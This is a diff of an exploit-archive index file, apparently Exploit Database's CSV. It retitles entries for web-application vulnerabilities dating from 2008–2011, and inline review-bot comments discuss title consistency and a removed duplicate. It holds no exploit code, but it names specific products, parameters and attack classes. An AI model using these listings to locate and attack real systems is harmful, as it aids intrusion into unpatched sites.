6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - (ann_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
6373,platforms/php/webapps/6373.txt,"Vastal I-Tech Visa Zone - (news_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
@ -19813,7 +19823,7 @@ id,file,description,date,author,platform,type,port
7002,platforms/php/webapps/7002.txt,"Joomla! Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,php,webapps,0
7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - 'moreinfo.php pg' SQL Injection",2008-11-05,G4N0K,php,webapps,0
7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - SQL Injection (Authentication Bypass)",2008-11-05,"Hussin X",php,webapps,0
7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0
7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps,0
7007,platforms/php/webapps/7007.txt,"Harlandscripts drinks - (recid) SQL Injection",2008-11-05,"Ex Tacy",php,webapps,0
7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0
7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script - SQL Injection",2008-11-05,InjEctOr5,php,webapps,0
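Review bot: The second 7005 line drops "SQL Injection" and keeps only "Authentication Bypass", which loses the technique, while the untouched 7008 line in the same hunk keeps "(Authentication Bypass) SQL Injection" and the 7004 line uses "SQL Injection (Authentication Bypass)"; pick one form for all three, e.g. "PHP JOBWEBSITE PRO - SQL Injection (Authentication Bypass)".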
@ -19824,7 +19834,7 @@ id,file,description,date,author,platform,type,port
7014,platforms/php/webapps/7014.txt,"DevelopItEasy News And Article System 1.4 - SQL Injection",2008-11-06,InjEctOr5,php,webapps,0
7015,platforms/php/webapps/7015.txt,"DevelopItEasy Membership System 1.3 - (Authentication Bypass) SQL Injection",2008-11-06,InjEctOr5,php,webapps,0
7016,platforms/php/webapps/7016.txt,"DevelopItEasy Photo Gallery 1.2 - SQL Injection",2008-11-06,InjEctOr5,php,webapps,0
7017,platforms/php/webapps/7017.txt,"Pre ADS Portal 2.0 - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-06,G4N0K,php,webapps,0
7017,platforms/php/webapps/7017.txt,"Pre ADS Portal 2.0 - Authentication Bypass / Cross-Site Scripting",2008-11-06,G4N0K,php,webapps,0
7018,platforms/php/webapps/7018.txt,"NICE FAQ Script - (Authentication Bypass) SQL Injection",2008-11-06,r45c4l,php,webapps,0
7019,platforms/php/webapps/7019.txt,"Arab Portal 2.1 (Windows) - Remote File Disclosure",2008-11-06,"Khashayar Fereidani",php,webapps,0
7020,platforms/php/webapps/7020.txt,"MySQL Quick Admin 1.5.5 - Local File Inclusion",2008-11-06,"Vinod Sharma",php,webapps,0
@ -19864,7 +19874,7 @@ id,file,description,date,author,platform,type,port
7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,php,webapps,0
7062,platforms/php/webapps/7062.txt,"ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0
7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0
7064,platforms/php/webapps/7064.pl,"Mambo Component 'com_n-forms' - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0
7064,platforms/php/webapps/7064.pl,"Mambo Component n-form - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0
7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - 'theme' Parameter Local File Inclusion",2008-11-08,dun,php,webapps,0
7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass",2008-11-08,G4N0K,php,webapps,0
7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,asp,webapps,0
@ -19941,7 +19951,7 @@ id,file,description,date,author,platform,type,port
7160,platforms/php/webapps/7160.php,"MyTopix 1.3.0 - (notes send) SQL Injection",2008-11-19,cOndemned,php,webapps,0
7162,platforms/php/webapps/7162.pl,"MauryCMS 0.53.2 - Arbitrary File Upload",2008-11-19,StAkeR,php,webapps,0
7163,platforms/php/webapps/7163.txt,"RevSense - (Authentication Bypass) SQL Injection",2008-11-19,d3b4g,php,webapps,0
7164,platforms/php/webapps/7164.txt,"Pre Job Board - (Authentication Bypass) SQL Injection",2008-11-19,R3d-D3V!L,php,webapps,0
7164,platforms/php/webapps/7164.txt,"Pre Job Board - Authentication Bypass",2008-11-19,R3d-D3V!L,php,webapps,0
7165,platforms/php/webapps/7165.pl,"wPortfolio 0.3 - Arbitrary File Upload",2008-11-19,Osirys,php,webapps,0
7166,platforms/php/webapps/7166.txt,"AskPert - (Authentication Bypass) SQL Injection",2008-11-19,TR-ShaRk,php,webapps,0
7168,platforms/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion",2008-11-20,StAkeR,php,webapps,0
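Review bot: The second 7164 line reduces "(Authentication Bypass) SQL Injection" to "Authentication Bypass", so the injection technique is no longer recorded, while the untouched 7163 and 7166 lines in the same hunk keep the old form; suggest "Pre Job Board - SQL Injection (Authentication Bypass)" so the hunk normalizes rather than diverges.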
@ -20138,7 +20148,7 @@ id,file,description,date,author,platform,type,port
7407,platforms/php/webapps/7407.txt,"WebMaster Marketplace - 'member.php u' SQL Injection",2008-12-10,"Hussin X",php,webapps,0
7408,platforms/php/webapps/7408.txt,"living Local 1.1 - (Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0
7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0
7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - (view.php id) SQL Injection",2008-12-10,Osirys,php,webapps,0
7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection",2008-12-10,Osirys,php,webapps,0
7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0
7413,platforms/asp/webapps/7413.pl,"CF_Calendar - 'calendarevent.cfm' SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
7414,platforms/asp/webapps/7414.txt,"CF_Auction - (forummessage) Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
@ -20679,7 +20689,7 @@ id,file,description,date,author,platform,type,port
8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) SQL Injection",2009-03-17,g4t3w4y,php,webapps,0
8229,platforms/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",php,webapps,0
8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - 'url' Parameter Remote File Inclusion",2009-03-17,Garry,php,webapps,0
8237,platforms/php/webapps/8237.txt,"facil-cms 0.1rc2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0
8237,platforms/php/webapps/8237.txt,"Facil-CMS 0.1RC2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0
8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - 'gal' Parameter Blind SQL Injection",2009-03-18,boom3rang,php,webapps,0
8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 - Arbitrary File Deletion",2009-03-18,"Alfons Luja",php,webapps,0
8240,platforms/php/webapps/8240.txt,"DeluxeBB 1.3 - 'qorder' Parameter SQL Injection",2009-03-18,girex,php,webapps,0
@ -20901,7 +20911,7 @@ id,file,description,date,author,platform,type,port
8664,platforms/php/webapps/8664.pl,"BigACE 2.5 - SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0
8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0
8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 - Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,php,webapps,0
8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - (member) SQL Injection",2009-05-13,YEnH4ckEr,php,webapps,0
8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - SQL Injection",2009-05-13,YEnH4ckEr,php,webapps,0
8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 - (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0
8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 - (Authentication Bypass / Cookie) SQL Injection",2009-05-13,Qabandi,php,webapps,0
8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 - Products Insecure Cookie Handling",2009-05-14,G4N0K,php,webapps,0
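Review bot: The second 8671 line removes "(member)" altogether instead of promoting it to "'member' Parameter SQL Injection" as the other entries in this patch do; suggest "Family Connections CMS 1.9 - 'member' Parameter SQL Injection" so the affected parameter is not lost.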
@ -21477,7 +21487,7 @@ id,file,description,date,author,platform,type,port
9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0
9604,platforms/php/webapps/9604.txt,"Joomla! Component com_Joomlaoc - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0
9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0
9609,platforms/php/webapps/9609.txt,"Mambo Component 'com_hestar' - SQL Injection",2009-09-09,M3NW5,php,webapps,0
9609,platforms/php/webapps/9609.txt,"Mambo Component Hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0
9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0
9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - 'cacheId' Parameter Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0
9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusion",2009-09-10,Kurd-Team,php,webapps,0
@ -21547,7 +21557,7 @@ id,file,description,date,author,platform,type,port
9826,platforms/php/webapps/9826.txt,"MindSculpt CMS - SQL Injection",2009-09-24,kaMitEz,php,webapps,0
9828,platforms/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection / Cross-Site Scripting",2009-09-23,"Alexey Sintsov",php,webapps,0
9830,platforms/php/webapps/9830.txt,"Cour Supreme - SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0
9832,platforms/php/webapps/9832.txt,"Joomla! / Mambo Component 'com_tupinambis' - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0
9832,platforms/php/webapps/9832.txt,"Joomla! / Mambo Component Tupinambis - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0
9833,platforms/php/webapps/9833.txt,"Joomla! Component com_facebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0
9834,platforms/asp/webapps/9834.txt,"BPLawyerCaseDocuments - SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
9835,platforms/php/webapps/9835.txt,"HB CMS 1.7 - SQL Injection",2009-09-22,"Securitylab Security Research",php,webapps,0
@ -21651,7 +21661,7 @@ id,file,description,date,author,platform,type,port
10169,platforms/php/webapps/10169.txt,"phpMyBackupPro - Arbitrary File Download",2009-11-16,"Amol Naik",php,webapps,0
10170,platforms/multiple/webapps/10170.txt,"Xerver 4.31 / 4.32 - HTTP Response Splitting",2009-11-18,s4squatch,multiple,webapps,80
10177,platforms/php/webapps/10177.txt,"Joomla! Extension iF Portfolio Nexus - SQL Injection",2009-11-18,"599eme Man",php,webapps,0
10178,platforms/php/webapps/10178.txt,"Joomla! / Mambo Component 'com_ezine' 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0
10178,platforms/php/webapps/10178.txt,"Joomla! / Mambo Component D4J eZine 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0
10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Multiple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0
10181,platforms/php/webapps/10181.txt,"Bitrix Site Manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0
10183,platforms/php/webapps/10183.php,"Joomla! 1.5.12 TinyMCE - Remote Code Execution (via Arbitrary File Upload)",2009-11-19,daath,php,webapps,80
@ -22002,7 +22012,7 @@ id,file,description,date,author,platform,type,port
10741,platforms/php/webapps/10741.txt,"Cybershade CMS 0.2 - Remote File Inclusion",2009-12-27,Mr.SeCreT,php,webapps,0
10742,platforms/php/webapps/10742.txt,"Joomla! Component com_dhforum - SQL Injection",2009-12-27,ViRuSMaN,php,webapps,0
10743,platforms/php/webapps/10743.txt,"phPay 2.2a - Backup",2009-12-26,indoushka,php,webapps,0
10750,platforms/php/webapps/10750.txt,"Mambo Component 'com_materialsuche' 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0
10750,platforms/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0
10751,platforms/php/webapps/10751.txt,"Dream4 Koobi Pro 6.1 Gallery - 'img_id' Parameter SQL Injection",2009-12-27,BILGE_KAGAN,php,webapps,0
10752,platforms/multiple/webapps/10752.txt,"Yonja - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80
10753,platforms/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80
@ -22076,9 +22086,9 @@ id,file,description,date,author,platform,type,port
10861,platforms/php/webapps/10861.txt,"Discuz 1.03 - SQL Injection",2009-12-31,indoushka,php,webapps,0
10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - (lng) Local File Inclusion",2009-12-31,cOndemned,php,webapps,0
10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - (Authentication Bypass) SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10873,platforms/php/webapps/10873.txt,"EasyGallery - 'catid' Parameter Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10874,platforms/php/webapps/10874.txt,"Pre News Manager - (nid) SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10874,platforms/php/webapps/10874.txt,"Pre News Manager - 'nid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10876,platforms/php/webapps/10876.txt,"PHP-MySQL-Quiz - SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10877,platforms/php/webapps/10877.txt,"PHP-AddressBook 3.1.5 - 'edit.php' SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10878,platforms/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup",2009-12-31,indoushka,php,webapps,0
@ -22360,7 +22370,7 @@ id,file,description,date,author,platform,type,port
11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0
11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps,0
11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,php,webapps,0
11446,platforms/php/webapps/11446.txt,"Mambo Component 'com_akogallery' - SQL Injection",2010-02-14,snakespc,php,webapps,0
11446,platforms/php/webapps/11446.txt,"Mambo Component AkoGallery - SQL Injection",2010-02-14,snakespc,php,webapps,0
11447,platforms/php/webapps/11447.txt,"Joomla! Component Jw_allVideos - Arbitrary File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0
11449,platforms/php/webapps/11449.txt,"Joomla! Component com_videos - SQL Injection",2010-02-14,snakespc,php,webapps,0
11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Exploit",2010-02-14,ROOT_EGY,php,webapps,0
@ -22523,7 +22533,7 @@ id,file,description,date,author,platform,type,port
11711,platforms/php/webapps/11711.txt,"Azeno CMS - SQL Injection",2010-03-13,"DevilZ TM",php,webapps,0
11715,platforms/php/webapps/11715.txt,"systemsoftware Community Black - 'index.php' SQL Injection",2010-03-13,"Easy Laster",php,webapps,0
11718,platforms/php/webapps/11718.txt,"Xbtit 2.0.0 - SQL Injection",2010-03-13,Ctacok,php,webapps,0
11719,platforms/php/webapps/11719.txt,"Mambo Component 'com_mambads' - SQL Injection",2010-03-13,Dreadful,php,webapps,0
11719,platforms/php/webapps/11719.txt,"Mambo Component MambAds - SQL Injection",2010-03-13,Dreadful,php,webapps,0
11721,platforms/php/webapps/11721.txt,"GeekHelps ADMP 1.01 - Multiple Vulnerabilities",2010-03-13,ITSecTeam,php,webapps,0
11722,platforms/php/webapps/11722.txt,"Ad Board Script 1.01 - Local File Inclusion",2010-03-13,ITSecTeam,php,webapps,0
11723,platforms/cgi/webapps/11723.pl,"Trouble Ticket Express 3.01 - Remote Code Execution / Directory Traversal",2010-03-14,zombiefx,cgi,webapps,0
@ -22738,7 +22748,7 @@ id,file,description,date,author,platform,type,port
12057,platforms/php/webapps/12057.txt,"Joomla! Component 'com_press' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
12058,platforms/php/webapps/12058.txt,"Joomla! Component 'com_joomlapicasa' 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps,0
12060,platforms/php/webapps/12060.txt,"Joomla! Component 'com_serie' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
12061,platforms/php/webapps/12061.txt,"Facil-CMS - (Local File Inclusion / Remote File Inclusion)",2010-04-04,eidelweiss,php,webapps,0
12061,platforms/php/webapps/12061.txt,"Facil-CMS 0.1RC2 - Local / Remote File Inclusion",2010-04-04,eidelweiss,php,webapps,0
12062,platforms/php/webapps/12062.txt,"Joomla! Component 'com_ranking' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
12065,platforms/php/webapps/12065.txt,"Joomla! Component 'com_jinventory' - Local File Inclusion",2010-04-05,"Chip d3 bi0s",php,webapps,0
12066,platforms/php/webapps/12066.txt,"Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
@ -22933,7 +22943,7 @@ id,file,description,date,author,platform,type,port
12369,platforms/php/webapps/12369.txt,"Madirish Webmail 2.01 - 'baseDir' Remote File Inclusion / Local File Inclusion",2010-04-24,eidelweiss,php,webapps,0
12370,platforms/php/webapps/12370.txt,"NCT Jobs Portal Script - Cross-Site Scripting / Authentication Bypass",2010-04-24,Sid3^effects,php,webapps,0
12371,platforms/php/webapps/12371.txt,"WHMCS control (WHMCompleteSolution) - SQL Injection",2010-04-24,"Islam DefenDers",php,webapps,0
12372,platforms/php/webapps/12372.txt,"AskMe Pro 2.1 - (que_id) SQL Injection",2010-04-24,v3n0m,php,webapps,0
12372,platforms/php/webapps/12372.txt,"Alstrasoft AskMe Pro 2.1 - 'que_id' Parameter SQL Injection",2010-04-24,v3n0m,php,webapps,0
12373,platforms/php/webapps/12373.txt,"Sethi Family Guestbook 3.1.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0
12374,platforms/php/webapps/12374.txt,"G5 Scripts Guestbook PHP 1.2.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0
12376,platforms/php/webapps/12376.php,"SmodCMS 4.07 (fckeditor) - Arbitrary File Upload",2010-04-24,eidelweiss,php,webapps,0
@ -23361,7 +23371,7 @@ id,file,description,date,author,platform,type,port
13866,platforms/php/webapps/13866.txt,"Joke Website Script - SQL Injection / Cross-Site Scripting",2010-06-14,Valentin,php,webapps,0
13867,platforms/php/webapps/13867.txt,"E-Book Store - SQL Injection",2010-06-14,Valentin,php,webapps,0
13880,platforms/asp/webapps/13880.txt,"Smart ASP Survey - Cross-Site Scripting / SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
13881,platforms/php/webapps/13881.txt,"Pre Job Board Pro - SQL Injection Authentication Bypass",2010-06-15,"L0rd CrusAd3r",php,webapps,0
13881,platforms/php/webapps/13881.txt,"Pre Job Board Pro - Authentication Bypass",2010-06-15,"L0rd CrusAd3r",php,webapps,0
13882,platforms/asp/webapps/13882.txt,"SAS Hotel Management System - user_login.asp SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
13883,platforms/asp/webapps/13883.txt,"Business Classified Listing - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
13884,platforms/asp/webapps/13884.txt,"Restaurant Listing with Online Ordering - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
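Review bot: the retitled 13881 drops the vulnerability class; "Pre Job Board Pro - SQL Injection Authentication Bypass" becomes "Pre Job Board Pro - Authentication Bypass", so the reader can no longer tell the bypass is reached through SQL injection. Other entries in this file keep both facts (for example "MyHobbySite 1.01 - SQL Injection / Authentication Bypass"), so "Pre Job Board Pro - SQL Injection / Authentication Bypass" would match the file's convention without losing information.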
@ -23797,7 +23807,7 @@ id,file,description,date,author,platform,type,port
14819,platforms/php/webapps/14819.html,"Pc4Uploader 9.0 - Cross-Site Request Forgery",2010-08-27,RENO,php,webapps,0
14820,platforms/php/webapps/14820.txt,"iGaming CMS - Multiple SQL Injections",2010-08-27,Sweet,php,webapps,0
14821,platforms/asp/webapps/14821.txt,"Shop Creator 4.0 - SQL Injection",2010-08-27,Pouya_Server,asp,webapps,0
14822,platforms/php/webapps/14822.txt,"DiY-CMS 1.0 - Multiple Remote File Inclusion",2010-08-28,LoSt.HaCkEr,php,webapps,0
14822,platforms/php/webapps/14822.txt,"DIY-CMS 1.0 - Multiple Remote File Inclusion",2010-08-28,LoSt.HaCkEr,php,webapps,0
14823,platforms/php/webapps/14823.txt,"textpattern CMS 4.2.0 - Remote File Inclusion",2010-08-28,Sn!pEr.S!Te,php,webapps,0
14826,platforms/php/webapps/14826.txt,"GaleriaSHQIP 1.0 - SQL Injection",2010-08-28,Valentin,php,webapps,0
14827,platforms/php/webapps/14827.py,"Blogman 0.7.1 - 'profile.php' SQL Injection",2010-08-28,"Ptrace Security",php,webapps,0
@ -23859,10 +23869,9 @@ id,file,description,date,author,platform,type,port
14969,platforms/asp/webapps/14969.txt,"ASP Nuke - SQL Injection",2010-09-11,Abysssec,asp,webapps,0
14973,platforms/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,php,webapps,0
14977,platforms/php/webapps/14977.txt,"MyHobbySite 1.01 - SQL Injection / Authentication Bypass",2010-09-12,"YuGj VN",php,webapps,0
14979,platforms/php/webapps/14979.txt,"Alstrasoft AskMe Pro 2.1 - (forum_answer.php?que_id) SQL Injection",2010-09-12,Amine_92,php,webapps,0
14980,platforms/asp/webapps/14980.txt,"eshtery CMS - SQL Injection",2010-09-12,Abysssec,asp,webapps,0
14985,platforms/php/webapps/14985.txt,"System Shop - (Module aktka) SQL Injection",2010-09-12,secret,php,webapps,0
14986,platforms/php/webapps/14986.txt,"Alstrasoft AskMe Pro 2.1 - (profile.php?id) SQL Injection",2010-09-12,CoBRa_21,php,webapps,0
14986,platforms/php/webapps/14986.txt,"Alstrasoft AskMe Pro 2.1 - 'profile.php' SQL Injection",2010-09-12,CoBRa_21,php,webapps,0
14988,platforms/php/webapps/14988.txt,"Group Office 3.5.9 - SQL Injection",2010-09-13,ViciOuS,php,webapps,0
14989,platforms/php/webapps/14989.txt,"osDate - 'uploadvideos.php' Arbitrary File Upload",2010-09-13,Xa7m3d,php,webapps,0
14991,platforms/asp/webapps/14991.txt,"Luftguitar CMS - Upload Arbitrary File",2010-09-13,Abysssec,asp,webapps,0
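Review bot: the hunk header goes from 10 lines to 9, and 14979 ("Alstrasoft AskMe Pro 2.1 - (forum_answer.php?que_id) SQL Injection") is the only entry without a retitled counterpart, so it appears to be the line being deleted, presumably as a duplicate of 12372, which is retitled to "Alstrasoft AskMe Pro 2.1 - 'que_id' Parameter SQL Injection" earlier in this patch. If that is the intent, platforms/php/webapps/14979.txt needs to be removed in the same commit (or the id redirected), otherwise the file is left orphaned with no index entry; the commit message should state the dedup so the id is not reused.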
@ -24098,7 +24107,7 @@ id,file,description,date,author,platform,type,port
15517,platforms/php/webapps/15517.txt,"Webmatic - 'index.php' SQL Injection",2010-11-13,v3n0m,php,webapps,0
15518,platforms/php/webapps/15518.txt,"Joomla! Component 'com_ccboard' 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0
15519,platforms/php/webapps/15519.txt,"OneOrZero AIms 2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,php,webapps,0
15524,platforms/php/webapps/15524.txt,"Pre Ads Portal - SQL Bypass",2010-11-13,Cru3l.b0y,php,webapps,0
15524,platforms/php/webapps/15524.txt,"Pre ADS Portal - Authentication Bypass",2010-11-13,Cru3l.b0y,php,webapps,0
15531,platforms/php/webapps/15531.txt,"BSI Advance Hotel Booking System 1.0 - SQL Injection",2010-11-14,v3n0m,php,webapps,0
15526,platforms/php/webapps/15526.txt,"Pre Online Tests Generator Pro - SQL Injection",2010-11-13,Cru3l.b0y,php,webapps,0
15550,platforms/php/webapps/15550.txt,"vBulletin 4.0.8 - Persistent Cross-Site Scripting via Profile Customization",2010-11-16,MaXe,php,webapps,0
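Review bot: same concern as for 13881: "Pre Ads Portal - SQL Bypass" is retitled to "Pre ADS Portal - Authentication Bypass", which fixes the product name but discards the injection vector. "Pre ADS Portal - SQL Injection / Authentication Bypass" keeps both and is consistent with the "Pre ADS Portal - 'cid' Parameter SQL Injection" title used for 10872 in this same patch.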
@ -24518,7 +24527,7 @@ id,file,description,date,author,platform,type,port
17035,platforms/php/webapps/17035.pl,"Constructr CMS 3.03 - Arbitrary File Upload",2011-03-23,plucky,php,webapps,0
17036,platforms/asp/webapps/17036.txt,"Web Wiz Forum - Injection",2011-03-23,eXeSoul,asp,webapps,0
17046,platforms/php/webapps/17046.txt,"SyndeoCMS 2.8.02 - Multiple Vulnerabilities (2)",2011-03-24,"High-Tech Bridge SA",php,webapps,0
17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 - (POST) Persistent Cross-Site Scripting / XML Injection",2011-03-26,LiquidWorm,php,webapps,0
17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 - Persistent Cross-Site Scripting / XML Injection",2011-03-26,LiquidWorm,php,webapps,0
17051,platforms/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 - Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps,0
17054,platforms/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",php,webapps,0
17055,platforms/php/webapps/17055.txt,"Honey Soft Web Solution - Multiple Vulnerabilities",2011-03-28,**RoAd_KiLlEr**,php,webapps,0
@ -25035,10 +25044,10 @@ id,file,description,date,author,platform,type,port
18185,platforms/php/webapps/18185.txt,"Muster Render Farm Management System - Arbitrary File Download",2011-12-01,"Nick Freeman",php,webapps,0
18192,platforms/php/webapps/18192.txt,"Joomla! Component 'com_jobprofile' - SQL Injection",2011-12-02,kaMtiEz,php,webapps,0
18193,platforms/php/webapps/18193.txt,"WSN Classifieds 6.2.12 / 6.2.18 - Multiple Vulnerabilities",2011-12-02,d3v1l,php,webapps,0
18198,platforms/php/webapps/18198.php,"Family Connections CMS 2.5.0 / 2.7.1 - (less.php) Remote Command Execution",2011-12-04,mr_me,php,webapps,0
18198,platforms/php/webapps/18198.php,"Family Connections CMS 2.5.0 / 2.7.1 - 'less.php' Remote Command Execution",2011-12-04,mr_me,php,webapps,0
18202,platforms/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' - SQL Injection",2011-12-05,"Stefan Schurtz",php,webapps,0
18207,platforms/php/webapps/18207.txt,"Alstrasoft EPay Enterprise 4.0 - Blind SQL Injection",2011-12-06,Don,php,webapps,0
18208,platforms/php/webapps/18208.rb,"Family Connections CMS - 'less.php' Remote Command Execution (Metasploit)",2011-12-07,Metasploit,php,webapps,0
18208,platforms/php/webapps/18208.rb,"Family Connections CMS 2.7.1 - 'less.php' Remote Command Execution (Metasploit)",2011-12-07,Metasploit,php,webapps,0
18215,platforms/php/webapps/18215.txt,"SourceBans 1.4.8 - SQL Injection / Local File Inclusion Injection",2011-12-07,Havok,php,webapps,0
18217,platforms/php/webapps/18217.txt,"SantriaCMS - SQL Injection",2011-12-08,Troy,php,webapps,0
18218,platforms/php/webapps/18218.txt,"Joomla! Component 'com_qcontacts' 1.0.6 - SQL Injection",2011-12-08,Don,php,webapps,0
